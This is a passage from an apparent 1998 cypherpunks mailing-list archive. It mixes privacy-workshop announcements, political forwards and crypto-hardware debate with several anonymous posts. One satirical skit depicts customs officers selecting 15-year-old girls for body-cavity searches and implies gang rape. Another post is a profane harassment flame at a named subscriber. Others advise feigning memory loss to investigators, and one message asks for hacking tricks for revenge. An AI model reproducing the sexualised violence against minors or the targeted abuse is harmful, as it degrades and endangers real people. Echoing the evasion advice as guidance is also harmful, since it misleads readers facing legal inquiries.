>amounts of evening/night fun in sunny Brighton.
>
>We called the workshops "Code Red" because.....well.....because it 
>sounds cool.  No other reason.
>
>We chose Brighton as the venue for the workshops because of the 
>mass of PI members and supporters there who can offer a billet (i.e. 
>free accommodation if you can stand sleeping with the cat/ dog/ 
>mainframe humm/ sound system/ travelling hippies etc etc.).
>
>The workshops are open to campaigners, IT experts, academics, journalists
and  
>anyone involved in the pursuit of privacy protection. 
>Chatham House rules will apply to the workshops. 
>
>The 1999 dates will be : 
>
>     January 9 & 10
>     February 13 & 14
>     March 13 & 14
>     April 10 & 11
>     May 8 & 9
>     June 12 & 13
>     July 10 & 11
>     August 7 & 8
>     September 11 & 12
>     October 9 & 10
>     November 13 & 14
>     December 11 & 12
>
>
>The Standing Agenda will be :
>
>Saturday 13.00 - 14.00    Amateur buffet lunch and guest speaker
>
>         14.00 - 18.00 :  Briefing and discussion of curent issues
>
>         18.00 -    :     pubbing, dining and clubbing in Brighton
>
>Sunday   11.00 - 15.00 :  Follow-up from Saturday, campaign strategy, 
>ad-hoc training sessions, comprehensive briefing sessions, and forward 
>planning  (can be extend if required).
>
>Within this agenda, the subject matter is flexible, and the sessions 
>are likely to cover a range of themes including internet privacy, 
>censorship, data protection law, workplace surveillance, 
>communications interception, police powers, national security and 
>visual surveillance.
>
>Anyone wanting to participate should call Simon Davies on 0958 466 
>552. There will be no cost, though a contribution of a few quid for 
>food would be gratefully received if you can afford it.
>
>BLOCK OUT THE DATES IN YOUR YOUR DIARY NOW !!
>
>We're looking forward to seeing you.
>
>Best wishes
>
>Simon Davies
>Director,
>Privacy International  
>
>email  simon@privacy.org
>
>www.privacy.org/pi/
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "COM PLAIN" <invalid_ban@hotmail.com>
Date: Thu, 3 Dec 1998 16:35:54 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: What's Down ....!!!!
Message-ID: <19981203080744.10865.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



In this letter i wanna know some tricks how to take revange, of a 
operator by hacking his code ,, can you help me ??? in alamak chat

www.alamak.com





______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 3 Dec 1998 13:20:28 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: FC: Emergency Powers and National Emergencies
Message-ID: <199812030505.VAA11806@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



>X-Sender: declan@mail.well.com
>X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.2 
>Date: Wed, 02 Dec 1998 23:56:10 -0500
>To: politech@vorlon.mit.edu
>From: Declan McCullagh <declan@well.com>
>Subject: FC: Emergency Powers and National Emergencies
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>"The President has the power to seize property, organize and control the
>means of production, seize commodities, assign military forces abroad, call
>reserve forces amounting to 2 1/2 million men to duty, institute martial
>law, seize and control all menas of transportation, regulate all private
>enterprise, restrict travel, and in a plethora of particular ways, control
>the lives of all Americans...
>
>"Most [of these laws] remain a a potential source of virtually unlimited
>power for a President should he choose to activate them. It is possible
>that some future President could exercise this vast authority in an attempt
>to place the United States under authoritarian rule.
>
>"While the danger of a dictatorship arising through legal means may seem
>remote to us today, recent history records Hitler seizing control through
>the use of the emergency powers provisions contained in the laws of the
>Weimar Republic."
>
>   --Joint Statement, Sens. Frank Church (D-ID) and Charles McMathias (R-MD)
>     September 30, 1973
>
>
>I came across this and the Senate special committee's 1973 report on
>Emergency Powers Statutes in Time Magazine's library. Powerful stuff.
>
>-Declan
>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 08:26:58 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812022357.AAA25807@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

>Check out this bit of american slavery:
>
>"Failing to register or otherwise comply with the
>Military Selective Service Act is, upon conviction,
>punishable by a fine of up to $250,000, impris-
>onment for up to five years, or both. A person
>who knowingly counsels, aids or abets another to
>fail to comply with the Act is subject to the same
>penalties."

Even more interesting is the fact that Congress was 
going to do away with the Selective Service a few years 
ago but President Clinton (accused of draft dodging 
during the Vietnam War) opposed getting rid of it.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 3 Dec 1998 22:14:28 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <577a9c19504c58a7eb1caed621c66fa1@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Thu, 3 Dec 1998 12:24:01 +0800 (CST)
>From: Bernardo B. Terrado <bbt@mudspring.uplb.edu.ph>
>To: cypherpunks@toad.com, coderpunks@toad.com
>Subject: MERRY CHRISTMAS! guys!

Fuck Christmas, Bernardo "Go Fuck Yourself" Terrado.

You and those bastards in the black helicopters can suck my Christmas cock.

>sorry if you're angry with this

Why the fuck would I be angry?  Go fuck yourself, Bernardo.

>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>"If a student is particular about his studies, especially while he is too
>young to know which are useful and which are not, we shall say he is no
>lover of learning or of wisdom; just as, if he were dainty about his food,
>we should say he was not hungry or fond of eating, but had a poor 
>appetite. " ---- PLATO

Wasn't Plato that cocksucker who didn't pay his taxes to THE MAN?

>By the way, it's Bernie not Bernardo.
>``````````````````````````````````````````````````````````````````````````````

Oh FUCK!  My apologies, Bernardo.  If I had known you preferred "Bernie", then I would have told you to go fuck your mother instead of yourself.

Warmest fucking regards to you and yer moms,

-- PureFuck
-- finger HillarysAsshole@whitehouse.gov for a good time





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 3 Dec 1998 14:39:19 +0800
To: cypherpunks@cyberpass.net
Subject: Fun at US Customs
Message-ID: <e941ee016b37d072bfaf447a99a99c23@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>Las Vegas police officer Rich Cashton said a Customs inspector who
>stopped him at Los Angeles International Airport last year grew angry
>when Cashton asked what would happen if he refused an X-ray.
>
>``He said, 'If you don't sign this form, I'm going to take you down to
>the hospital and pump your stomach,'' Cashton recalled. ``He was using
>that threat as intimidation to make me sign a consent form, which is
>definitely illegal.''
>
>Cashton, who identified himself as a police officer, was let go.

"Sir, we'll have to ask you to come with us."

"What is the problem, officer?"

"We have reason to believe that you are bringing contraband into this 
country. Please remove your clothing and bend over."

"Comrade, surely you must be mistaken! I am a loyal citizen!"

"Remove your clothing and bend over or we'll do it for you, Libertarian
scum."

"Libertarian? You are mistaken, comrade! I am a loyal citizen! I am a
card-carrying party member!" *shows card*

"That's fine, Officer Cashton, if that is your real name, but how can
we be sure that you are who you claim to be?"

"My biometrics, of course, comrade!" *he's scanned*

"Sorry for the mixup, Comrade Cashton. We're about to go find some 
pretty young 15 year old girls to strip search and do body cavity
searches on, then temporarily plug their body cavities so that they
do not use them in indecent ways or for smuggling contraband."

"Comrade, whatever do you mean?"

"Are you sure you're a fellow jack booted thug? Do you have your manual?
You must have your manual at all times! Fine. You may borrow mine, 
comrade. Read the section titled 'Rape of the Citizenry'."

"Ah, I understand now, comrade. I was not aware that such actions were
permitted. Let's go."

***Fifteen minutes later***

Young woman 1: (crying) "What have we done, officers? I am loyal!"

Young woman 2: (sobs incoherently)

Customs Officer: "You are suspected of smuggling contraband into this
country! You are traitors!"

Young woman 1: "My sister and I most certaintly are NOT traitors!"

Customs Officer: "Then prove it. Remove your clothing and submit to
a body cavity search. Officer Cashton? Take your pick."

*searches are performed*

Customs Officer: "Now, ladies, we have concerns that you may attempt
to smuggle contraband out after the body cavity search is performed."

Young woman 2: (sobs incoherently)

Young woman 1: (crying louder) "But there is no contraband here!
How can we smuggle it out?"

Officer Cashton: (removing a bag of cocaine from his pocket and 
throwing it at the women) "Yes there is."

Customs Officer: "Ah, I see you are a quick study, Comrade Cashton!
Now ladies, just to make sure you don't smuggle anything out in your 
body cavities, we've invited the ground crew here to fill them and 
lead you naked in chains to your flight after they tire of your
company."

Officer Cashton and Customs Officer together: (giving a Nazi-style 
salute) "Heil Klinton! Heil Reno! Heil Freeh!"

......

StatistMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 13:46:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
Message-ID: <199812030527.GAA29380@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Hello, I'm Special Agent Murfrock of the IRS and this is Special 
Agent Prenfrew. We'd like to speak with you about C. J. Parker, 
maybe known to you as "Toto" or "TruthMonger..."

Sorry, I don't recognize any of those. Isn't Toto the dog?

The dog?

Yes, Dorothy's dog in... (stops when he notices that the agents are
scribbling furiously in their notebooks)

May we come in?

No, I was just about to go to sleep. I'm not well.

Sorry to hear that. We have an e-mail here that you sent to Toto, 
and another he sent back to you...

May I see those? (takes the printouts)

Sorry, doesn't ring a bell.

Well, if you look at those headers, the ones circled in red, you
will see that...

You must be kidding! There are more people forging e-mail headers
than live in St. Louis! Everybody knows that.

Would you mind if we just come in for a moment?

Yes, I would. I told you, I am going to sleep.

Would you mind if we look at your computer?

Why would you want to do that?

Well if you didn't send or receive these messages, you have 
nothing to worry about.

I don't see any reason to do that.

We can get a warrant, very quickly, as a matter of fact. If you
cooperate, things will go better for you.

I love to cooperate. I want to cooperate. I am cooperating to the
fullest extent I believe is required of me. Ask me something that
makes sense and I'll answer it.

Have you ever heard of a group called the Cypherpunks?

It rings a bell.

Are you a member?

No.

How do you explain the fact that we found your e-mail address on
a Cypherpunks membership list in a computer we seized?

I have no idea. I don't join organizations.

Are you a member of the Majordomo organization?

No. The only majordomo I've ever heard of is a mail list manager.

Where have you seen this Majordomo?

Oh, everywhere. I think it's worldwide in scope.

(scribble scribble)

It's some kind of utility program. Everybody uses it.

(scribbling stops)
What can you tell us about it?

Nothing, really. If you want to get on a mail list you send a
"subscribe" message to a majordomo. If you want to get off, I
think you send an "unscrive" message.

Have you ever done that?

Maybe. I don't recall. Anyone can submit your e-mail address 
to lists, so you don't even have to subscribe to be on an 
e-mail list. And there's so much spam these days that I don't 
recognize half the stuff I get. 

Spam? (the agents look at each other)

Junk e-mail. I delete most of my e-mail without even reading it.
Sometimes my email program crashes and it all gets deleted before
I can look at it.

(scribble scribble)
How many lists have you joined?

I don't remember. I never paid any attention to those things,
and since I banged my head three months ago, I haven't been
remembering a lot of things.

(scribble scribble)
So, are you denying being a member of the Cypherpunks?

I don't know what that means.

Have you ever subscribed to the Cypherpunks e-mail list?

I have no idea.

You have no idea? You don't remember?

I don't know what I've subscribed to, unsubscribed from,
what I get, don't get. E-mail is a complete mess and I
ignore most of it. I'm really not very good at those
things.

May we look?

No.

Are you going to make us get a warrant?

Get what you like. My disk crashed last week and I threw it away.
Lost everything. In fact I just formatted my new disk and the 
only data on it is manuscripts for the columns I write.

Columns?

I write for a magazine and a couple of newspapers.

(oh shit)
(scribble scribble)
Oh yeah? Which ones?

I don't think that's appropriate.

Well, we'll be back. Here's my card in case you think of anything
you'd like to tell us.

Sure.

One more thing. Have you ever been invited to join something
called The Circle of Eunuchs, e-u-n-u-c-h-s?

I don't recall ever hearing of anything like that.

Do you know who Tim May is?

Nope. Sounds like a real common name, though.

How about Blanc?

Is that French?

Never mind. Thanks. We'll be seeing you.

(I don't _think_ so)

-----

AmnesiaMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@chemweb.com
Date: Thu, 3 Dec 1998 23:25:56 +0800
To: cypherpunks@toad.com
Subject: Welcome to ChemWeb.com
Message-ID: <199812031440.GAA07048@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Dr cypherpunks cypherpunks

Congratulations.

Your registration has been successful and you are now a
member of ChemWeb.com, the World-Wide Club for the Chemical
Community.

Your free registration allows you access to all of the
facilities at http://chemweb.com.  You can now browse and
search journals in the library, databases, the conference
diary, the shopping mall, and the job exchange, as well as
keeping up to date with the latest news from The Alchemist
on-line magazine.

If you ever forget your password or username, just send an
e-mail to info@chemweb.com with your name/e-mail
address, and we will help you find it, without you having
to re-register.

We are constantly improving the ChemWeb club site, and we
welcome any suggestions you may have.  I hope you find
ChemWeb.com useful, and I look forward to seeing you there
soon.

Sincerely,

Bill Town,
Chief Operating Officer,
ChemWeb, Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 14:06:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
Message-ID: <199812030552.GAA30881@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On marte, 01.12.1998, "Blanc" <blancw@cnw.com> wrote: 

> I received my visit from the friendly IRS guys tonight, asking 
> about CJ/Toto.

Pre-schoolers'R'Us. You got a visit from the advance guys.

> It seems that they had a copy of two emails...one of them the one 
> in which I chastized him for sending a threatening letter to Billg. 

Admissions, admissions.

Would some duly licensed bar attorney on this list PUH-LEEZE tell
these children how to behave in the presence of criminal inquisitors?

> They wanted to know about my associations with Toto (I still think 
> of him by that name), of course, of which I had none except through 
> email. 

So _you_ say! They open doors; you walk through them; you can easily 
find yourself in Wonderland. Don't come crying to _me_!

> In our conversation, 

There is no such thing as a "conversation" with them; there is 
only an "interrogation." Everything you say is interpreted as an 
admission, a denial, or an evasion. You are a perp. You are dogshit. 

> I discovered things that I didn't know about Toto's situation:

You mean you heard more _allegations_? 

If you're not careful, your neighbours will be the next ones to be
"discovering things we didn't know" about _you_. That's the way they
turn people against targets, and anyone they interview can become
another target in the blink of an eye.

> that he had sent threatening letters to the Mounties, 

Alleged, and only to _you_ as far as you know...

> and that he had threated to kill the judge trying Jim's case.

Alleged, and only to _you_ as far as you know...

> I'm afraid CJ really went over the edge here and backed himself up 
> in a corner. 

GodDAMN! I'm glad you're not a friend of mine! I don't know if I even
want to _know_ whether you're wearing panties or not anymore.

> I should have chastized him more severely and counseled him against 
> rash acts of unkindness (not that I hold myself responsible for what
> he did, but he did pay attention to me).

Geez! I wonder what you must gush up about your _enemies_!

> Kind of amusingly, one of them asked if CJ had ever asked me to join 
> the Circle of Eunuchs!  heh.

Yeah, that's funny. It should also have set off all your alarm bells
that you're dealing with clueless fuckwits who can't find their fly
without a map and whose only interest in life is putting anybody
they can in prison, on any excuse whatsoever. If they can weave 
together a Circle of Eunuchs or a Cult of the Kernel or a conspiracy 
of Fanatic Followers of the Seashell, they'll be content to do it. 
You could tell them that the leader of the militant arm of the Circle 
is the infamous but cryptic "General Error" and they'd write it down 
with a straight face.

To you, it's a joke. To them, it's a statement with possible 
evidentiary value. And nothing's funny.

> I explained that it was Toto's Art imitating Life, creating stories 

You don't explain _anything_ to them. You can only give them leads 
and evidence. Of course, if you *insist* on having such a fucking 
good memory and on gushing on about all sorts of things, well, don't 
be surprised if they conclude that you _do_ know a lot about this Toto 
stuff, after all, and maybe merit another, more probing interview.

> We had a bit of discussion on a number of things, 

I'll _bet_ you did! Sounds like you made a nearly _perfect_ subject 
for interrogation.

> including the subject of free speech and how close one can get to it 
> before being subject to arrest. 

Ooooooo! That sounds _delicious_! You can entertain attorneys with 
that one. You will be thrilled at the wondrous range of awful 
expressions they make. Some may even quietly throw up in a corner.

> I asked them what that crucial point was when this would happen, 
> since there is no crime until action is actually taken.

Shows how much _you_ know. 

And now you get your legal advice from the IRS CID? That's really 
bright.

> They said this would be when...
> I referenced as an example the web site...

Nice of them. Did they indemnify should you rely on their advice and 
get busted or sued? Didn't think so.

> One of the investigators also brought up the issue of...
> I remarked that one must always be prepared for the unexpected...
> they made some points about taking threats seriously...

"Hyperseriously" is more like it.

You're a regular motormouth, aren't you? Now they have you knowing
a lot more about Toto-ish things than just the email showed, they have 
you red-flagged as "attempting to draw the agent into arguments about 
law or the Constitution," they have you flagged as being way too 
bright for an innocent person, and demonstrating an interest in 
discussing the technicalities of the law on threats to public 
officials, which interest, just coincidentally, happens to dovetail 
quite nicely with the essential subject matter of their investigation. 
I'd give pretty good odds you're going to get another visit. If you 
don't have a lawyer present on the next one, I'd say you're, uh, 
sorry, there's just no other word: _stupid_.

> I asked if cypherpunks would actually be subpoenaed to appear at 
> CJ's trial. They said it depends on CJ: if he accepts a deal, he 
> would likely get a reduced sentence, but if he takes them to trial 
> then there could be quite a number of Cpunks called forth.

Ooooooo! Lovely! FUD! Big time FUD! Divide and conquer FUD! CJ becomes
the bad guy for not cutting a deal and instead inconveniencing all 
those busy Cpunks, all of them probably suddenly writing code instead 
of flaming each other in endless and pointless threads of non-crypto!

> I suggested if that happens we could all go out to dinner
> : ) and they thought this would be quite interesting. 

Of _course_ it would! More "conversation," leads, admissions,
denials and evasions! More grist for the mill! More perps! Get them
to pick up the tab -- they'll be able to put it on their expense
reports! It's called an informal group interrogation.

Geez, how can bright people be so fucking STUPID?

> One of the investigators expressed a great interest in the cpunk 
> dicussions and concepts; 

Doh! It's his _job_ to be interested in a subject matter touching on 
an active investigation.

> I described...I'm sure given a little time and several dinners we 
> could convert him to the Dark Side. <g>

Geez! Don't you realize that they _are_ the Dark Side! Have you been 
living under a rock for the last few decades?

"You know, Gunther, those Gestapo men who visited last night to ask 
about the Goldblums next door were very polite. One of them expressed 
great interest in concepts and discussions of Judaism, and Jewish 
family trees. I described something of what the religion is about and 
referred him to some libraries and gave him some titles to read. I'm 
sure, given a little time and several dinners, we could convert him to 
our side."

Right. Maybe you understand now why I'm not on the Cpunks list?

RabidFreedomMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 3 Dec 1998 14:33:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: I Got Mine
Message-ID: <199812030612.HAA32547@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I have this really, really bad memory problem. It gets worse
under stress. I also have this metaphysical dilemma thing.
I know the guy next door. I guess. Actually I don't know him.
I've called him Joe, but it wouldn't be right for me to say
to anyone official that his name is Joe, because I've never
checked his ID, so I don't really know, and even if I had
checked his ID, I still wouldn't _know_, would I? He's always
been a nice fellow, and I wouldn't want to cause him undeserved
harm by leaping to conclusions about him. Does he have a wife?
I don't know. I may have seen a woman around his place, but
I couldn't leap to the conclusion that she is his wife. I
might assume so out of courtesy to them, but I wouldn't presume
to tell someone official that he is Joe or that he has a wife,
because I really don't know. Most of what I _think_ I know,
and which serves quite well for inviting each other to our
barbeques and for borrowing small tools, is stuff I don't
actually _know_ and don't care about one way or another.
And that affects my memory when people ask questions about
him. 

Did I see those two young men snatch a purse from that 
lady over there? Yes. Can I describe them? Yes. Did I notice 
what they were wearing and in which direction they ran? Yes.

Do I know anything about Joe? Nope. Does he have a wife? I
have no idea. What does he do for a living? Gosh, I have no
idea.

The law requires you to give up information you have when 
asked by a law enforcement officer investigating a crime.
The law does not and cannot require you to notice things or
to have a good memory. If your memory gets worse as the
things being investigated stray farther and farther from
common law crimes and into the realm of "bureaucrime" and
thought crime, well, that's just too fucking bad.

I'd make a really bad juror, too. It's not a memory thing there,
it's more of a comprehension thing. I just have trouble seeing
guilt if the law itself is bogus. Not guilty. What? Are you
crazy? They had him dead to rights laundering money! Sorry, I
just can't believe the evidence. It just doesn't add up for me.
Explain why not! Sorry, I can't. It just doesn't work for me.

If more people had these problems, all the bureaucrimes and other
victimless crimes would, sadly, be history overnight. The IRS 
would lose every single case that went to a jury, and within 
months the income tax would be repealed, a no-audit, no-go-to-
jail sales tax would be in place, and most of the people 
working for the IRS would be looking for a new job. I would be
very saddened by the rude reality of all that, but, hey, what
the hell?

Will these problems that afflict me spread? You'd better hope 
your sorry ass they do! If they don't, we're all in for a very
rough ride, and not 50 years from now, but tomorrow and next
year. We're already well down the slippery slope. Personally,
though, I think we're in for a shitstorm. That's because
people are basically unprepared for the degree of evil that
has been refined and distilled in government. They're still
way too willing to spout off about things they don't even 
know, to presume the worst, even of their friends and 
acquaintances, to play full rube right into the hands of
truly evil people who have _their_ act down to a science.

If large scale genocide has been going on all through the last
several years in Bosnia while people on this list have been 
consumed in flame wars and pseudo-propellor-head duels on a
scale of delicacy of the medieval mace, how much more easily
can and does largely bloodless subjugation take place all
around us? If people can allow Ruby Ridges and Wacos to take
place without congressional offices being _filled_ every day
with outraged citizenry and recall petitions being launched
for every politician who even hesitates in taking a firm stand,
how can we think that the gradual sapping of our liberty will
evoke a response until things first get very, very bad.

There is a peaceful solution available today. At one level you
don't have to have a good memory in all things to be a law-
abiding and responsible citizen-unit. Just say "No, I don't
remember" about things that are none of your business. At 
another level, you don't have to put up with bureaucrimes when 
you sit on a Grand Jury or a trial jury. Just say "No." Don't 
argue; don't convince; just say "No" across the board to 
bureaucrimes. It takes 51% of the voters to win an election. 
It only takes 5% of the jurors to kill a bad law.

Nothing else will work. Nothing else has ever worked. If this
is not done now, we will all face terrible choices and
tragedies within as few as ten years.

AmnesiaMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 3 Dec 1998 22:00:54 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Fwd: FC: Gun groups take aim at new FBI database (fwd)
Message-ID: <199812031346.HAA19880@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 03 Dec 1998 11:01:25 +0100
> From: "Albert P. Franco, II" <apf2@apf2.com>
> Subject: Re: Fwd: FC: Gun groups take aim at new FBI database

> Some of the following statements do not (in my recollection) apply to those
> in California... 
> >
> >The following statements are true:
> >
> >It is legal to own a car without a driver's license or vehicle registration.
> 
> In CA only "junk" cars can be unregistered. An unregistered car on private
> property can be cited under a long list of circumstances. 

Only if they can see it. Otherwise they'd need to execute a warrant to even
find it.

Park it in a garage or a niche in the backyard, problem solved.

> >No permission is required to purchase a car and felons, the mentally ill,
> >children, aliens and those guilty of misdemeanor domestic violence offenses
> >can buy cars and most of the above can drive cars on public streets and
> roads.
> 
> I do believe that there are some legal restrictions for children purchasing
> cars...

There are legal restrictions on children buying anything. Technicaly the
sale isn't final without a guardians signature as co-signatory of the bill
of sale.

> >You are not required to report the purchase of a car to anyone.  
> 
> Since every car in CA MUST be registered, every change of ownership must be
> reported. If you do not you are subject to a fine. They give you ten days
> to report the transfer of ownership.

In most states the time limit and further instructions are on the vehicle
license. If you buy it via a loan then other terms may apply.

> >It is legal to drive a car on public streets and roads in the US with a
> >license from any jurisdiction on earth.
> 
> Only for a limited period of time in CA...

Unless it's an international license that is recognized by the US this isn't
true. Simply having a drivers license from England, for example, won't allow
you to drive a vehicle in any of the states anymore than your CA license
will let you drive legaly there.

> >It is legal to drive a car on public streets and roads in the US that is
> >registered in other states or nations.
> 
> Not if the owner is a resident of CA, and again only for a limited period
> of time.

Actualy as long as the owner isn't a resident (not the driver) and doesn't
stay in whatever state over some period set by the legislature then it is
permissible. In a lot of states it is between 30-90 days.

I'd bet the limit in CA is the residence time limit. I rather doubt that
anyone staying in CA 11 days automaticaly becomes a resident with a right
to vote in state elections and such.

> >It is legal to drive a car on public streets and roads in the US that is
> >owned by and registered to any person or legal entity.
> >
> >Legal entities can own and register cars and permit anyone they like to
> >drive them.
> >
> 
> But they assume all the liability and even possible criminal consequences
> for letting unlicensed persons drive the car.

It depends on the insurance limitations. My Bronco II is technicly
uninsured, and therefore illegal to drive, unless I am the driver.

In some cases even if the driver is licensed the owner still assumes
liability. At least here in Texas irrespective of who is driving the vehicle,
the owner is ultimately responsible for the vehicle. So if you loan it to
cousin Bippy and he has a wreck and runs away guess who gets to go to court
on leaving-the-scene charges. Now if you roll on Bippy the situation may
change.

> >Note that if we regulated guns like driving, the above would mean that you
> >could buy and use a gun on your own property without licensing,
> >registration or reporting.
> 
> NOT in CA...

Move to Texas. You can still drive your unregistred, uninspected vehicle on
your own property at your own speed and have wrecks at your convenience
(within the constraints of your deed restrictions of course). Way too many
bubba's still live in Texas for this sort of stuff to go over at all.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@chemweb.com
Date: Fri, 4 Dec 1998 01:31:58 +0800
To: cypherpunks@toad.com
Subject: ChemWeb password
Message-ID: <199812031647.IAA10088@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Dr cypherpunks cypherpunks

Someone has used our password utility located at

http://chemweb.com/user_gateway/html/forgot_password.html

to request that the password for your account be sent to this email address
(the one that we have on file for your account).  If it wasn't you, don't 
worry, because no one can ever get your password except you (we only 
mail it to the email address on file).  Someone probably entered the 
wrong address by accident.

If it was you, then here's the information that you've been waiting for.

Your Member Name is: cypherpunks
Your Current Password is: cpunks

For additional help with technical problems, please see our online 
help guide at

http://chemweb.com/help/html/index.html

ChemWeb administration




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>x@w.xyz
Date: Thu, 3 Dec 1998 16:34:31 +0800
To: cypherpunks@Algebra.COM
Subject: Re: "Export" controls
Message-ID: <199812030820.JAA08564@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>You sure it's not Microshaft? More meanings.

Macroshit ? But I digress.

>A little experiment is often a good thing. I heard that the guys who
>made the DES cracker have had $$ requests for machines and/or chips.

Their architecture has real $$ value because it cracks 99% of "encrypted"
traffic.

>In case you missed it, my original reply was an attempt to open
>discussion on some type of cooperative effort.

Offering the real stuff for sale in US requires some investment. Whether it
is hardware (128-bit crypto engine on a PCI card ?) or software plug-in
for the aforementioned OS that makes all traffic go through IPsec with
128-bit non-DES block cipher, some amount of money must be put to a risk.

We are not talking here about free stuff. We are talking about products
that can be deployed by non-programmers, businesses etc., that will be
supported professionally (the perceived quality of professional support
vs. free stuff is immaterial here.)

>purposes. I wonder how many DES or IDEA engines could be put on a 500K
>gate array? It would fit about 35 instantiations of Twofish. That should
>be enough for a phone or a disk encryptor.

Hardware is overkill for the single voice line. PGPfone works fine there.

>Who want to get them done. <-- the key item

If there is a demand, it will be done. Let's run a small poll:

How much would you pay for transparent hardware/software solution that
encrypts all traffic between peer users (assuming all rational crypto
requirements are met, like available source code etc.) ?

>No sense pushing the button without critical mass.

The main problem with hard crypto is that it is so equalizing. Any pauper
can cheaply encrypt and make it hard for any government to break. This is
not the case with guns, where more resources almost linearly buy more power.

-

One of the posters mentioned that PGP is retailed in CompUSA. My mistake, I
did not check them (but I did check 3 other big chains).

-

On the wild side, suppose that all crypto restrictions are terminated. Some
would say that now "they" can break all available stuff. In any case the
value of crypto products in the eyes of buyers would fall. If it is legal
it is no good. Most of the research would lose the best people. Cypherpunks
would cease to exist. A very dangerous proposition.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 4 Dec 1998 02:56:01 +0800
To: cypherpunks@Algebra.COM
Subject: Re: "Export" controls
Message-ID: <3666D33A.596E@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Their architecture has real $$ value because it cracks 99% of
> "encrypted" traffic.
>
What type of attack was used in the famous test? Known plaintext? It
gets a bit tougher in the real world doesn't it?

> Offering the real stuff for sale in US requires some investment.
>
Really?

> We are not talking here about free stuff. We are talking about
> products that can be deployed by non-programmers, businesses etc.,
> that will be supported professionally 
>
Every product I ever worked on started off as a big ugly prototype
sprawled across a table top hooked to all sorts of life support systems.
And not all products are taken to market by those who did the initial
design work. License. For something like we're discussing here I think
the *big* cash outlay comes post-prototype with mask, fab, plastics,
production lines and marketing. Upfront it's mostly neurons.

I expect it would be easier to convince a manufacturer to participate
with a working prototype than it would with only an idea.

> Hardware is overkill for the single voice line. PGPfone works fine
> there.      ^^^^^^^^
>
No it is not. 500k gates may be too much but I maintain that you simply
cannot trust the Wintel HW, Windows or anything you cannot analyze in
detail and freeze. Besides, people like little palm-sized gadgets.

> How much would you pay for transparent hardware/software solution that
> encrypts all traffic between peer users
>
We all know the magic price points. But is that particular product all
that interesting? Even if peer traffic is encrypted the system can be
infected and can transmit anything ( disk, RAM eg ) to other adresses.
I'm afraid I don't know enough about the networking stuff to feel that a
system can be secured while it is on-line. 

Now an embedded system for secure e-mail that used a PC as a gateway
might be kind of cool. You drop encrypted attachments onto a driver that
sends them to the unit where you read them. Anything you enter and
encrypt at the unit is presented as a file at the host to be attached
and sent. USB would be plenty quick for that sort of stuff.

You might say that it should be done on the host as SW or on another PC
but we're back to the Wintel HW again. No thanks. I wonder what could be
done with a palm pilot. Are full schematics and BIOS and driver code
available? You *might* throw out everything but and build it there.
You'd want to do some EMI testing.

I still like my SCSI/IDE gizmo for off-line PC's.

> The main problem with hard crypto is that it is so equalizing. Any
> pauper can cheaply encrypt and make it hard for any government to
> break. 
>
